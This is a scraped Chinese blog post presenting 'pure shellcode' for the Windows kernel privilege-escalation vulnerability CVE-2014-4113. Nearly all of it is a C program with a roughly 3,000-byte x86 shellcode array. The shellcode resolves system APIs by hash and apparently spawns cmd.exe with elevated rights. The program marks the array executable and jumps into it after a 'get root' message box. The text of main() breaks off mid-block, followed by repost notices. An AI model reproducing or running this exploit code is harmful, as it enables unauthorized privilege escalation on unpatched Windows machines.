211

212

213

214

215

216

217

218

219

220

221

来自4B5F5F4B

#include <Windows.h>

#include <stdio.h>

BYTE ShellCode[] = {

0xE8,0x00,0x00,0x00,0x00,0x58,0x05,0x0F,0x00,0x00,0x00,0xFF,0xE0,

0xE8,0x00,0x00,0x00,0x00,0x58,0xC3,0x55,0x8B,0xEC,0x81,0xEC,0x54,0x02,0x00,0x00,

0x53,0x56,0x57,0x6A,0x28,0xC7,0x45,0x84,0x6E,0x74,0x64,0x6C,0xC7,0x45,0x88,0x6C,

0x2E,0x64,0x6C,0xC7,0x45,0x8C,0x6C,0x00,0x00,0x00,0xC7,0x45,0x90,0x75,0x73,0x65,

0x72,0xC7,0x45,0x94,0x33,0x32,0x2E,0x64,0xC7,0x45,0x98,0x6C,0x6C,0x00,0x00,0xC7,

0x45,0xE4,0x63,0x6D,0x64,0x2E,0xC7,0x45,0xE8,0x65,0x78,0x65,0x00,0x59,0x8D,0x85,

0x5C,0xFF,0xFF,0xFF,0xC6,0x00,0x00,0x40,0x49,0x75,0xF9,0xE8,0xA0,0xFF,0xFF,0xFF,

0x83,0xE8,0x05,0x89,0x45,0xF8,0xE8,0x2B,0x0B,0x00,0x00,0x8B,0xF8,0x68,0x22,0x02,

0x07,0x4D,0x89,0x7D,0x9C,0xE8,0x57,0x0B,0x00,0x00,0x68,0x54,0x34,0x4F,0xA2,0x89,

0x45,0xAC,0xE8,0x4A,0x0B,0x00,0x00,0x68,0xCC,0x2F,0x66,0x26,0x89,0x45,0xA0,0xE8,

0x3D,0x0B,0x00,0x00,0x68,0xB9,0x6B,0xFF,0xCB,0x89,0x45,0xA4,0xE8,0x30,0x0B,0x00,

0x00,0x68,0xC4,0xD9,0xC4,0xD8,0x89,0x45,0xB4,0xE8,0x23,0x0B,0x00,0x00,0x68,0x76,

0x2C,0x1D,0x07,0x89,0x45,0xA8,0xE8,0x16,0x0B,0x00,0x00,0x68,0xD5,0xC4,0x3B,0xB9,

0x89,0x45,0xB8,0xE8,0x09,0x0B,0x00,0x00,0x68,0x16,0xDD,0x20,0x3E,0x89,0x45,0xB0,

0xE8,0xFC,0x0A,0x00,0x00,0x68,0xCD,0x68,0x51,0xB4,0x89,0x45,0xBC,0xE8,0xEF,0x0A,

0x00,0x00,0x68,0xCF,0x87,0x2D,0x70,0x89,0x45,0xC0,0xE8,0xE2,0x0A,0x00,0x00,0x68,

0x48,0xEE,0xF6,0x73,0x89,0x45,0xC4,0xE8,0xD5,0x0A,0x00,0x00,0x68,0xC8,0xF7,0xE9,

0x77,0x89,0x45,0xC8,0xE8,0xC8,0x0A,0x00,0x00,0x68,0xB8,0xEB,0xCB,0x05,0x89,0x45,

0xCC,0xE8,0xBB,0x0A,0x00,0x00,0x68,0xD9,0xE5,0x1A,0x06,0x89,0x45,0xD0,0xE8,0xAE,

0x0A,0x00,0x00,0x89,0x45,0xD4,0x83,0xC4,0x38,0x8D,0x45,0x84,0x50,0xFF,0x55,0xB8,

0x8B,0xF8,0x68,0xD6,0x4C,0xCC,0xF0,0x89,0x7D,0xD8,0xE8,0x92,0x0A,0x00,0x00,0x68,

0x72,0x2E,0x99,0x9E,0x89,0x45,0xE0,0xE8,0x85,0x0A,0x00,0x00,0x59,0x89,0x45,0xDC,

0x59,0x8D,0x45,0x90,0x50,0xFF,0x55,0xB8,0x8B,0xF8,0x68,0x89,0x65,0x34,0xFF,0x89,

0xBD,0x14,0xFF,0xFF,0xFF,0xE8,0x67,0x0A,0x00,0x00,0x89,0x85,0x48,0xFF,0xFF,0xFF,

0xC7,0x04,0x24,0x09,0x18,0xD0,0x1F,0xE8,0x55,0x0A,0x00,0x00,0x68,0x0A,0xB0,0x5D,

0x83,0x89,0x85,0x38,0xFF,0xFF,0xFF,0xE8,0x45,0x0A,0x00,0x00,0x68,0xDF,0xD6,0x9B,

0xB9,0x89,0x85,0x1C,0xFF,0xFF,0xFF,0xE8,0x35,0x0A,0x00,0x00,0x68,0x62,0xC9,0x88,

0xA7,0x89,0x85,0x30,0xFF,0xFF,0xFF,0xE8,0x25,0x0A,0x00,0x00,0x89,0x85,0x2C,0xFF,

0xFF,0xFF,0x68,0x0C,0x5D,0x47,0xC7,0xE8,0x15,0x0A,0x00,0x00,0x68,0x9A,0xA0,0x01,

0x9E,0x89,0x85,0x3C,0xFF,0xFF,0xFF,0xE8,0x05,0x0A,0x00,0x00,0x68,0x0C,0x62,0x82,

0x3B,0x89,0x85,0x34,0xFF,0xFF,0xFF,0xE8,0xF5,0x09,0x00,0x00,0x68,0xBC,0xB1,0xAF,

0x6A,0x89,0x85,0x28,0xFF,0xFF,0xFF,0xE8,0xE5,0x09,0x00,0x00,0x68,0xF0,0x7F,0xC1,

0x3C,0x89,0x85,0x18,0xFF,0xFF,0xFF,0xE8,0xD5,0x09,0x00,0x00,0x68,0x55,0xD5,0x52,

0x82,0x89,0x85,0x40,0xFF,0xFF,0xFF,0xE8,0xC5,0x09,0x00,0x00,0x68,0xE6,0xA7,0xF3,

0xF4,0x89,0x85,0x4C,0xFF,0xFF,0xFF,0xE8,0xB5,0x09,0x00,0x00,0x68,0xBE,0xB8,0xCB,

0x36,0x89,0x85,0x20,0xFF,0xFF,0xFF,0xE8,0xA5,0x09,0x00,0x00,0x68,0x50,0x7F,0x60,

0xB7,0x89,0x85,0x24,0xFF,0xFF,0xFF,0xE8,0x95,0x09,0x00,0x00,0x68,0x7C,0x64,0x8A,

0x5C,0x89,0x85,0x44,0xFF,0xFF,0xFF,0xE8,0x85,0x09,0x00,0x00,0x68,0x17,0xD1,0x89,

0xFD,0x89,0x85,0x50,0xFF,0xFF,0xFF,0xE8,0x75,0x09,0x00,0x00,0x68,0x1D,0x5A,0x19,

0x9F,0x89,0x85,0x54,0xFF,0xFF,0xFF,0xE8,0x65,0x09,0x00,0x00,0x89,0x85,0x58,0xFF,

0xFF,0xFF,0x8D,0x45,0x9C,0x83,0xC4,0x40,0x50,0xE8,0x19,0x06,0x00,0x00,0x33,0xDB,

0x59,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x3B,0xC3,0x75,0x03,0xFF,0x55,0xB4,0x8D,0x85,

0xAC,0xFD,0xFF,0xFF,0x50,0x8D,0x45,0x9C,0x50,0x8D,0x45,0xD8,0x50,0xE8,0x0A,0x05,

0x00,0x00,0x8B,0xF0,0x83,0xC4,0x0C,0x8D,0x85,0xAC,0xFD,0xFF,0xFF,0x50,0xFF,0x55,

0xB8,0x8B,0xF8,0x68,0x03,0xAF,0xCE,0x03,0x89,0x7D,0xEC,0xE8,0x11,0x09,0x00,0x00,

0x59,0x8B,0xCE,0x2B,0xCF,0x03,0xC1,0x89,0x45,0xF0,0x89,0x75,0xEC,0xFF,0x55,0xC4,

0x8B,0x7D,0xF8,0x89,0x9D,0x70,0xFF,0xFF,0xFF,0x89,0x9D,0x6C,0xFF,0xFF,0xFF,0x89,

0x9D,0x68,0xFF,0xFF,0xFF,0x89,0x85,0x60,0xFF,0xFF,0xFF,0xBE,0x00,0x10,0x40,0x00,

0xB9,0x31,0x16,0x40,0x00,0xBB,0xB6,0x16,0x40,0x00,0x2B,0xFE,0x03,0xF9,0x8B,0xC3,

0x2B,0xC1,0x8D,0x4D,0xF4,0x51,0x6A,0x40,0x50,0x57,0xC7,0x85,0x64,0xFF,0xFF,0xFF,

0x04,0x00,0x00,0x00,0x89,0x45,0xFC,0xFF,0x55,0xCC,0x33,0xD2,0x39,0x55,0xFC,0x0F,

0x86,0x8E,0x00,0x00,0x00,0x8D,0x04,0x3A,0x8B,0x08,0x81,0xF9,0xCC,0xBB,0xAA,0xCC,

0x77,0x47,0x74,0x3D,0x81,0xF9,0xAA,0xAA,0xAA,0xAA,0x74,0x30,0x81,0xF9,0xBB,0xAA,

0xBB,0xAA,0x74,0x20,0x81,0xF9,0xCC,0xAA,0xCC,0xAA,0x74,0x10,0x81,0xF9,0xBB,0xBB,

0xBB,0xBB,0x75,0x55,0x8B,0x8D,0x20,0xFF,0xFF,0xFF,0xEB,0x4B,0x8B,0x8D,0x3C,0xFF,

0xFF,0xFF,0xEB,0x43,0x8B,0x8D,0x38,0xFF,0xFF,0xFF,0xEB,0x3B,0x8B,0x4D,0xC8,0xEB,

0x36,0x8D,0x8D,0x6C,0xFF,0xFF,0xFF,0xEB,0x2E,0x81,0xF9,0xDD,0xCC,0xDD,0xCC,0x74,

0x20,0x81,0xF9,0xDD,0xBB,0xAA,0xDD,0x74,0x10,0x81,0xF9,0xDD,0xDD,0xDD,0xDD,0x75,

0x18,0x8B,0x8D,0x44,0xFF,0xFF,0xFF,0xEB,0x0E,0x8D,0x8D,0x74,0xFF,0xFF,0xFF,0xEB,

0x06,0x8B,0x8D,0x40,0xFF,0xFF,0xFF,0x89,0x08,0x42,0x3B,0x55,0xFC,0x0F,0x82,0x72,

0xFF,0xFF,0xFF,0x8B,0x7D,0xF8,0x8D,0x4D,0xF4,0x51,0xB8,0x38,0x17,0x40,0x00,0x2B,

0xC3,0x6A,0x40,0x2B,0xFE,0x50,0x03,0xFB,0x57,0x89,0x45,0xFC,0xFF,0x55,0xCC,0x33,

0xD2,0x39,0x55,0xFC,0x0F,0x86,0x85,0x00,0x00,0x00,0x8D,0x04,0x3A,0x8B,0x08,0x81,

0xF9,0xDD,0xCC,0xBB,0xAA,0x74,0x66,0x81,0xF9,0xCC,0xDD,0xBB,0xAA,0x74,0x56,0x81,

0xF9,0xDD,0xCC,0xAA,0xBB,0x74,0x46,0x81,0xF9,0xAA,0xCC,0xDD,0xBB,0x74,0x31,0x81,

0xF9,0xDD,0xBB,0xAA,0xCC,0x74,0x21,0x81,0xF9,0xAA,0xBB,0xDD,0xCC,0x74,0x10,0x81,

0xF9,0xCC,0xBB,0xAA,0xDD,0x75,0x3E,0x8D,0x8D,0x74,0xFF,0xFF,0xFF,0xEB,0x34,0x8B,

0x4D,0xF8,0x2B,0xCE,0x03,0xCB,0xEB,0x2B,0x8B,0x8D,0x48,0xFF,0xFF,0xFF,0xEB,0x23,

0x8B,0x4D,0xF8,0x2B,0xCE,0x81,0xC1,0x31,0x16,0x40,0x00,0xEB,0x16,0x8B,0x8D,0x4C,

0xFF,0xFF,0xFF,0xEB,0x0E,0x8D,0x8D,0x70,0xFF,0xFF,0xFF,0xEB,0x06,0x8B,0x8D,0x44,

0xFF,0xFF,0xFF,0x89,0x08,0x42,0x3B,0x55,0xFC,0x0F,0x82,0x7B,0xFF,0xFF,0xFF,0x8B,

0x7D,0xF8,0xB8,0x38,0x17,0x40,0x00,0x2B,0xFE,0x03,0xF8,0xBB,0xAC,0x17,0x40,0x00,

0x2B,0xD8,0x8D,0x45,0xF4,0x50,0x6A,0x40,0x53,0x57,0xFF,0x55,0xCC,0x33,0xD2,0x85,

0xDB,0x74,0x3A,0x8D,0x04,0x3A,0x8B,0x08,0x81,0xF9,0xDD,0xCC,0xBB,0xAA,0x74,0x20,

0x81,0xF9,0xDD,0xBB,0xCC,0xAA,0x74,0x10,0x81,0xF9,0xCC,0xBB,0xDD,0xAA,0x75,0x18,

0x8B,0x8D,0x50,0xFF,0xFF,0xFF,0xEB,0x0E,0x8B,0x8D,0x28,0xFF,0xFF,0xFF,0xEB,0x06,

0x8D,0x8D,0x68,0xFF,0xFF,0xFF,0x89,0x08,0x42,0x3B,0xD3,0x72,0xC6,0x8B,0x7D,0xF8,

0xB8,0xE4,0x15,0x40,0x00,0x2B,0xFE,0x03,0xF8,0xBB,0x31,0x16,0x40,0x00,0x2B,0xD8,

0x8D,0x45,0xF4,0x50,0x6A,0x40,0x53,0x57,0xFF,0x55,0xCC,0x33,0xD2,0x89,0x55,0xFC,

0x3B,0xDA,0x76,0x4C,0x8B,0x45,0xFC,0x03,0xC7,0x8B,0x08,0x81,0xF9,0xDD,0xCC,0xBB,

0xAA,0x74,0x30,0x81,0xF9,0xDD,0xCC,0xAA,0xBB,0x74,0x20,0x81,0xF9,0xDD,0xBB,0xAA,

0xCC,0x74,0x10,0x81,0xF9,0xCC,0xBB,0xAA,0xDD,0x75,0x1D,0x8D,0x8D,0x5C,0xFF,0xFF,

0xFF,0xEB,0x13,0x8D,0x8D,0x64,0xFF,0xFF,0xFF,0xEB,0x0B,0x8D,0x8D,0x60,0xFF,0xFF,

0xFF,0xEB,0x03,0x8B,0x4D,0xF0,0x89,0x08,0xFF,0x45,0xFC,0x39,0x5D,0xFC,0x72,0xB4,

0x8D,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x85,0x10,0xFF,0xFF,0xFF,0x8D,0x45,0x9C,0x89,

0x85,0x00,0xFF,0xFF,0xFF,0x8D,0x45,0xD8,0x89,0x85,0x08,0xFF,0xFF,0xFF,0x8D,0x45,

0xEC,0x89,0x85,0x0C,0xFF,0xFF,0xFF,0x8D,0x85,0x14,0xFF,0xFF,0xFF,0x89,0x85,0x04,

0xFF,0xFF,0xFF,0x8B,0x45,0xF8,0x52,0x52,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x2B,0xC6,

0x8D,0x8D,0x00,0xFF,0xFF,0xFF,0x51,0x05,0x76,0x1A,0x40,0x00,0x50,0x52,0x52,0xFF,

0x55,0xA4,0x68,0xE0,0x93,0x04,0x00,0x50,0xFF,0x55,0xB0,0x6A,0x44,0x5A,0x8B,0xCA,

0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0xC6,0x00,0x00,0x40,0x49,0x75,0xF9,0x6A,0x10,0x59,

0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0xC6,0x00,0x00,0x40,0x49,0x75,0xF9,0x8D,0x85,0xF0,

0xFE,0xFF,0xFF,0x50,0x33,0xF6,0x8D,0x85,0xAC,0xFE,0xFF,0xFF,0x50,0x56,0x56,0x56,

0x56,0x56,0x56,0x8D,0x45,0xE4,0x50,0x56,0x89,0x95,0xAC,0xFE,0xFF,0xFF,0xC7,0x85,

0xD8,0xFE,0xFF,0xFF,0x01,0x00,0x00,0x00,0xFF,0x55,0xA0,0x56,0xFF,0x55,0xB4,0x5F,

0x5E,0x5B,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x18,0xC7,0x45,0xFC,0xDD,0xCC,0xBB,

0xAA,0xC7,0x45,0xF0,0xDD,0xCC,0xAA,0xBB,0xC7,0x45,0xEC,0xDD,0xBB,0xAA,0xCC,0xC7,

0x45,0xE8,0xCC,0xBB,0xAA,0xDD,0x8D,0x45,0xF4,0x50,0x8B,0x45,0xF0,0xFF,0x30,0xFF,

0x55,0xFC,0x8D,0x45,0xF8,0x50,0x8B,0x45,0xEC,0xFF,0x30,0xFF,0x55,0xFC,0x8B,0x45,

0xE8,0x8B,0x00,0x8B,0x4D,0xF8,0x8B,0x0C,0x08,0x8B,0x55,0xF4,0x89,0x0C,0x10,0xC9,

0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x20,0x56,0xC7,0x45,0xF0,0xAA,0xAA,0xAA,0xAA,0xC7,

0x45,0xE0,0xBB,0xBB,0xBB,0xBB,0xC7,0x45,0xE8,0xDD,0xCC,0xDD,0xCC,0xC7,0x45,0xE4,

0xDD,0xDD,0xDD,0xDD,0xC7,0x45,0xF4,0xBB,0xAA,0xBB,0xAA,0xC7,0x45,0xFC,0xCC,0xAA,

0xCC,0xAA,0xC7,0x45,0xEC,0xCC,0xBB,0xAA,0xCC,0xC7,0x45,0xF8,0xDD,0xBB,0xAA,0xDD,

0xBE,0xEB,0x01,0x00,0x00,0x39,0x75,0x0C,0x75,0x25,0xFF,0x55,0xF0,0x8B,0x45,0xEC,

0x83,0x38,0x00,0x74,0x0C,0xFF,0x55,0xFC,0xFF,0x75,0x14,0xFF,0x75,0x10,0x56,0xEB,

0x17,0xC7,0x00,0x01,0x00,0x00,0x00,0xFF,0x55,0xFC,0x6A,0xFB,0x58,0xEB,0x14,0xFF,

0x75,0x14,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0x8B,0x45,0xF8,0xFF,0x30,

0xFF,0x55,0xF4,0x5E,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x20,0x56,0xC7,0x45,0xE0,

0xDD,0xCC,0xBB,0xAA,0xC7,0x45,0xF0,0xDD,0xCC,0xAA,0xBB,0xC7,0x45,0xE8,0xDD,0xBB,

0xAA,0xCC,0xC7,0x45,0xEC,0xCC,0xBB,0xAA,0xDD,0xC7,0x45,0xFC,0xCC,0xDD,0xBB,0xAA,

0xC7,0x45,0xF4,0xAA,0xCC,0xDD,0xBB,0xC7,0x45,0xE4,0xAA,0xBB,0xDD,0xCC,0x8B,0x75,

0x10,0x81,0x7E,0x08,0xEB,0x01,0x00,0x00,0x75,0x2F,0x8B,0x45,0xFC,0x83,0x38,0x00,

0x75,0x27,0xC7,0x00,0x01,0x00,0x00,0x00,0xFF,0x75,0xE4,0x6A,0x04,0xFF,0x55,0xE0,

0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x10,0xFF,0x75,0xF4,0x6A,0xFC,0xFF,0x76,

0x0C,0xFF,0x55,0xF0,0x8B,0x4D,0xEC,0x89,0x01,0x56,0xFF,0x75,0x0C,0xFF,0x75,0x08,

0x6A,0x00,0xFF,0x55,0xE8,0x5E,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x10,0xC7,0x45,

0xF8,0xDD,0xCC,0xBB,0xAA,0xC7,0x45,0xFC,0xDD,0xBB,0xCC,0xAA,0xC7,0x45,0xF4,0xCC,

0xBB,0xDD,0xAA,0x81,0x7D,0x0C,0x21,0x01,0x00,0x00,0x75,0x39,0x8B,0x45,0xF8,0x33,

0xC9,0x41,0x39,0x08,0x74,0x2F,0x89,0x08,0x6A,0x00,0x6A,0x28,0x68,0x00,0x01,0x00,

0x00,0xFF,0x75,0x08,0xFF,0x55,0xFC,0x6A,0x00,0x6A,0x27,0x68,0x00,0x01,0x00,0x00,

0xFF,0x75,0x08,0xFF,0x55,0xFC,0x6A,0x00,0x6A,0x00,0x68,0x01,0x02,0x00,0x00,0xFF,

0x75,0x08,0xFF,0x55,0xFC,0xFF,0x75,0x14,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,

0x08,0xFF,0x55,0xF4,0x89,0x45,0xF0,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x8B,0xEC,0x83,

0xEC,0x30,0x56,0x8B,0x75,0x0C,0x57,0x8D,0x45,0xD0,0x50,0xC7,0x45,0xD0,0x6D,0x73,

0x76,0x63,0xC7,0x45,0xD4,0x72,0x74,0x2E,0x64,0xC7,0x45,0xD8,0x6C,0x6C,0x00,0x00,

0xC7,0x45,0xFC,0x6E,0x74,0x00,0x00,0xC7,0x45,0xF8,0x65,0x78,0x65,0x00,0xFF,0x56,

0x1C,0x8B,0xF8,0x68,0x92,0xD6,0xB4,0x14,0xE8,0xE4,0x03,0x00,0x00,0x89,0x45,0xE0,

0xC7,0x04,0x24,0x05,0x92,0xB4,0x14,0xE8,0xD5,0x03,0x00,0x00,0x8B,0x7D,0x08,0x59,

0x89,0x45,0xE4,0x8D,0x45,0x0C,0x50,0x6A,0x0A,0x8D,0x45,0xE8,0x50,0x6A,0x0B,0xFF,

0x57,0x04,0x3D,0x04,0x00,0x00,0xC0,0x75,0x78,0xFF,0x75,0x0C,0x6A,0x40,0xFF,0x56,

0x20,0x8B,0xF0,0x8D,0x45,0x0C,0x50,0xFF,0x75,0x0C,0x56,0x6A,0x0B,0xFF,0x57,0x04,

0x85,0xC0,0x75,0x5D,0x8B,0x06,0x85,0xC0,0x74,0x52,0x53,0x6A,0xE4,0x8D,0x7E,0x04,

0x5B,0x8D,0x77,0x1C,0x2B,0xDF,0x89,0x45,0x08,0x8D,0x45,0xFC,0x50,0x56,0xFF,0x55,

0xE0,0x59,0x59,0x85,0xC0,0x74,0x29,0x8D,0x45,0xF8,0x50,0x56,0xFF,0x55,0xE0,0x59,

0x59,0x85,0xC0,0x74,0x1B,0x0F,0xB7,0x46,0xFE,0x03,0xC3,0x03,0xC6,0x8D,0x44,0x38,

0x1C,0x50,0xFF,0x75,0x10,0xFF,0x55,0xE4,0x8B,0x46,0xEC,0x59,0x59,0x89,0x45,0xF4,

0x81,0xC6,0x1C,0x01,0x00,0x00,0xFF,0x4D,0x08,0x75,0xBE,0x5B,0x8B,0x45,0xF4,0xEB,

0x02,0x33,0xC0,0x5F,0x5E,0xC9,0xC3,0x55,0x8B,0xEC,0x81,0xEC,0x94,0x00,0x00,0x00,

0x8D,0x85,0x6C,0xFF,0xFF,0xFF,0x50,0x8B,0x45,0x08,0xC7,0x85,0x6C,0xFF,0xFF,0xFF,

0x94,0x00,0x00,0x00,0xFF,0x50,0x0C,0x85,0xC0,0x75,0x04,0x33,0xC0,0xC9,0xC3,0x83,

0xBD,0x70,0xFF,0xFF,0xFF,0x05,0x75,0x30,0x83,0xBD,0x74,0xFF,0xFF,0xFF,0x00,0x74,

0x20,0x83,0xBD,0x74,0xFF,0xFF,0xFF,0x01,0x74,0x10,0x83,0xBD,0x74,0xFF,0xFF,0xFF,

0x02,0x75,0x07,0xB8,0xD8,0x00,0x00,0x00,0xC9,0xC3,0xB8,0xC8,0x00,0x00,0x00,0xC9,

0xC3,0xB8,0x2C,0x01,0x00,0x00,0xC9,0xC3,0x83,0xBD,0x70,0xFF,0xFF,0xFF,0x06,0x75,

0xBA,0x83,0xBD,0x74,0xFF,0xFF,0xFF,0x00,0x74,0x10,0x83,0xBD,0x74,0xFF,0xFF,0xFF,

0x01,0x75,0x0E,0xB8,0xF8,0x00,0x00,0x00,0xC9,0xC3,0xB8,0xE0,0x00,0x00,0x00,0xC9,

0xC3,0x8B,0x45,0x08,0xC9,0xC3,0x55,0x8B,0xEC,0x51,0x51,0x57,0x85,0xF6,0x74,0x48,

0xB8,0x4D,0x5A,0x00,0x00,0x66,0x39,0x01,0x75,0x3E,0x8B,0x41,0x3C,0x8B,0x54,0x08,

0x34,0x8B,0x44,0x08,0x50,0x03,0xC2,0x33,0xC9,0x80,0x3C,0x31,0xE8,0x75,0x15,0x8B,

0x7C,0x31,0x01,0x03,0xF9,0x8D,0x7C,0x37,0x05,0x89,0x7D,0xF8,0x3B,0xFA,0x76,0x04,

0x3B,0xF8,0x72,0x03,0x41,0xEB,0xE2,0x85,0xFF,0x74,0x08,0x8B,0x45,0xF8,0xFF,0xD0,

0x89,0x45,0xFC,0x8B,0x45,0xFC,0xEB,0x02,0x33,0xC0,0x5F,0xC9,0xC3,0x55,0x8B,0xEC,

0x83,0xEC,0x10,0x8B,0x08,0x56,0x8B,0x70,0x40,0xE8,0x98,0xFF,0xFF,0xFF,0x89,0x45,

0xF0,0x85,0xC0,0x75,0x04,0x33,0xC0,0xEB,0x56,0x6A,0x40,0x68,0x00,0x30,0x10,0x00,

0x8D,0x45,0xFC,0x50,0x6A,0x00,0x8D,0x45,0xF8,0x50,0x8B,0x45,0x08,0x33,0xF6,0x46,

0x6A,0xFF,0x89,0x75,0xF8,0xC7,0x45,0xFC,0x00,0x20,0x00,0x00,0xFF,0x50,0x08,0x85,

0xC0,0x75,0xD2,0xB8,0xE4,0x15,0x40,0x00,0x2D,0x00,0x10,0x40,0x00,0x03,0x45,0x0C,

0x89,0x45,0xF4,0x8B,0x45,0xF0,0x3E,0xA3,0x03,0x00,0x00,0x00,0x3E,0xC6,0x05,0x11,

0x00,0x00,0x00,0x04,0x8B,0x45,0xF4,0x3E,0xA3,0x5B,0x00,0x00,0x00,0x8B,0xC6,0x5E,

0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xEC,0x68,0x57,0x6A,0x30,0x59,0x8B,0xD1,0x8D,0x45,

0x98,0xC6,0x00,0x00,0x40,0x4A,0x75,0xF9,0x8B,0xD1,0x8D,0x45,0xC8,0xC6,0x00,0x00,

0x40,0x4A,0x75,0xF9,0x89,0x4D,0x98,0x89,0x4D,0xC8,0xFF,0x56,0x44,0x8B,0xF8,0x85,

0xFF,0x74,0x4B,0x8D,0x45,0x98,0x50,0x6A,0x01,0x6A,0x00,0x57,0xC7,0x45,0x9C,0x40,

0x00,0x00,0x00,0xFF,0x56,0x20,0x85,0xC0,0x74,0x34,0x8B,0x45,0x08,0x83,0xC0,0x20,

0xC7,0x45,0xCC,0x44,0x00,0x00,0x00,0x89,0x7D,0xDC,0xC6,0x00,0x4B,0x89,0x45,0xEC,

0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0xFF,0x56,0x44,0x8B,0xF8,0x85,0xFF,0x74,0x11,

0x8D,0x45,0xC8,0x50,0x6A,0x01,0x6A,0x00,0x57,0xFF,0x56,0x20,0xEB,0x03,0x8B,0x7D,

0xF8,0x8B,0xC7,0x5F,0xC9,0xC3,0x55,0x8B,0xEC,0x83,0xE4,0xF8,0x83,0xEC,0x64,0x8B,

0x45,0x08,0x8B,0x50,0x08,0x8B,0x08,0x53,0x56,0x8B,0x70,0x04,0x57,0x8B,0x78,0x10,

0x6A,0x24,0x89,0x54,0x24,0x14,0x89,0x4C,0x24,0x18,0xC7,0x44,0x24,0x1C,0x66,0x75,

0x63,0x6B,0xC7,0x44,0x24,0x20,0x63,0x6E,0x69,0x74,0xC7,0x44,0x24,0x24,0x73,0x65,

0x63,0x00,0x5A,0x8D,0x44,0x24,0x24,0x33,0xDB,0x88,0x18,0x40,0x4A,0x75,0xFA,0x6A,

0x28,0x5A,0x8D,0x44,0x24,0x48,0x88,0x18,0x40,0x4A,0x75,0xFA,0x8B,0x47,0x1C,0x2D,

0x00,0x10,0x40,0x00,0x05,0x38,0x17,0x40,0x00,0x89,0x44,0x24,0x4C,0x8D,0x44,0x24,

0x18,0x89,0x44,0x24,0x6C,0x8D,0x44,0x24,0x24,0x50,0xFF,0x51,0x34,0x83,0x7C,0x24,

0x24,0x09,0x0F,0x84,0x95,0x00,0x00,0x00,0x8D,0x44,0x24,0x48,0x50,0xFF,0x56,0x04,

0x85,0xC0,0x0F,0x84,0x85,0x00,0x00,0x00,0x53,0x53,0x53,0x53,0x53,0x53,0x6A,0xFF,

0x6A,0xFF,0x53,0x53,0xFF,0xB4,0x24,0x94,0x00,0x00,0x00,0x53,0xFF,0x56,0x08,0x89,

0x44,0x24,0x0C,0x3B,0xC3,0x74,0x66,0xFF,0x77,0x1C,0x8B,0xC6,0xFF,0x74,0x24,0x14,

0xE8,0x48,0xFE,0xFF,0xFF,0x59,0x59,0x85,0xC0,0x74,0x52,0x57,0xE8,0xB1,0xFE,0xFF,

0xFF,0x59,0x89,0x44,0x24,0x10,0x3B,0xC3,0x74,0x43,0x8B,0x44,0x24,0x14,0xFF,0x50,

0x2C,0x50,0x8B,0x47,0x1C,0x2D,0x00,0x10,0x40,0x00,0x53,0x05,0xB6,0x16,0x40,0x00,

0x50,0x6A,0x04,0xFF,0x56,0x0C,0x85,0xC0,0x74,0x23,0x53,0xFF,0x74,0x24,0x10,0xB8,

0xF0,0xD8,0xFF,0xFF,0x53,0x50,0x50,0x53,0xFF,0x74,0x24,0x28,0xFF,0x56,0x10,0x85,

0xC0,0x74,0x0A,0x53,0x53,0x53,0xFF,0x74,0x24,0x18,0xFF,0x56,0x14,0x5F,0x5E,0x33,

0xC0,0x5B,0x8B,0xE5,0x5D,0xC3,0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x40,0x30,0x8B,

0x40,0x0C,0x8B,0x40,0x1C,0x33,0xC9,0x8B,0x00,0x8B,0x50,0x20,0x66,0x83,0x7A,0x10,

0x2E,0x74,0x06,0x41,0x83,0xF9,0x02,0x7C,0xEE,0x8B,0x40,0x08,0xC3,0x33,0xC0,0xEB,

0x09,0x6B,0xC0,0x21,0x0F,0xBE,0xC9,0x03,0xC1,0x42,0x8A,0x0A,0x84,0xC9,0x75,0xF1,

0xC3,0x55,0x8B,0xEC,0x51,0x8B,0x47,0x3C,0x83,0x65,0xFC,0x00,0x53,0x56,0x8B,0x74,

0x38,0x78,0x03,0xF7,0x8B,0x5E,0x20,0x03,0xDF,0x83,0x7E,0x18,0x00,0x76,0x1C,0x8B,

0x13,0x03,0xD7,0xE8,0xC5,0xFF,0xFF,0xFF,0x3B,0x45,0x08,0x74,0x14,0x83,0xC3,0x04,

0xFF,0x45,0xFC,0x8B,0x45,0xFC,0x3B,0x46,0x18,0x72,0xE4,0x33,0xC0,0x5E,0x5B,0xC9,

0xC3,0x8B,0x4D,0xFC,0x8B,0x46,0x24,0x8D,0x04,0x48,0x0F,0xB7,0x04,0x38,0x8B,0x4E,

0x1C,0x8D,0x04,0x81,0x8B,0x04,0x38,0x03,0xC7,0xEB,0xE2

};

DWORD ShellCodeSize = 3115;

int main()

{

DWORD dwMemProtect = 0;

MessageBoxA(NULL,"!!!get root!!!","PWN",0);

if (VirtualProtect((LPVOID)ShellCode,ShellCodeSize,0x40,&dwMemProtect))

{

__asm

{

lea eax,ShellCode

jmp eax

}

转载请注明： 转载自Legend‘s BLog

本文链接地址: CVE-2014-4113 纯 Shellcode

未经允许不得转载：Legend‘s BLog » CVE-2014-4113 纯 Shellcode

CVE-2014-4113 纯 Shellcode

相关推荐

发表评论取消回复

相关推荐

发表评论 取消回复

发表评论取消回复